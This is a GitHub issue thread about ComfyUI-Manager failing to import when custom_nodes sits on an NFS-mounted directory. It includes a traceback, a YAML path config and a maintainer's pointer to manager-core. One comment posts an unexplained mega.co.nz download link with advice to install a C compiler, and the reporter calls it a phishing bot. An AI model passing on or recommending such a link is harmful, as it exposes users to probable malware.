### ISSUE TITLE
Module fails to load if using a different location for custom_nodes

### ISSUE THREAD

**Issue by ryanwalder** [Comfy-Org/ComfyUI-Manager#1072]
I have my comfyui data on a NAS (mounted via NFS) for easy cross computer access. When loading this module from the remote `custom_nodes` dir (`/media/ai/image-gen/comfyui/customnodes`) it fails to load with the below error. If loaded from the comfyui `custom_nodes` dir (`/home/username/comfyui`) it loads without issue.

```
Traceback (most recent call last):
  File "/home/ryan/git/comfyui/nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/media/ai/image-gen/comfyui/custom_nodes/ComfyUI-Manager/__init__.py", line 6, in <module>
    from .glob import manager_server
  File "/media/ai/image-gen/comfyui/custom_nodes/ComfyUI-Manager/glob/manager_server.py", line 16, in <module>
    import manager_core as core
```
Comfy UI install location: `/home/username/comfyui`

`extra_models_paths.yaml`:
```yaml
comfyui:
  base_path: /media/ai/image-gen/comfyui
  checkpoints: models/checkpoints/
  clip: models/clip/
  clip_vision: models/clip_vision/
  configs: models/configs/
  controlnet: models/controlnet/
  embeddings: models/embeddings/
  loras: models/loras/
  upscale_models: models/upscale_models/
  vae: models/vae/
 
other_ui:
  base_path: /media/ai/image-gen/comfyui
  checkpoints: models/checkpoints
  gligen: models/gligen
  custom_nodes: custom_nodes
```

**Comment by achilles0x** [comment]
maybe this will help
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ryanwalder** [comment]
> maybe this will help https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic If you don't have the c compliator, install it.(gcc or clang)

Piss off phsing bot.

**Comment by ltdrdata** [comment]
This is supported in `manager-core`.
You can use `default` property in there.
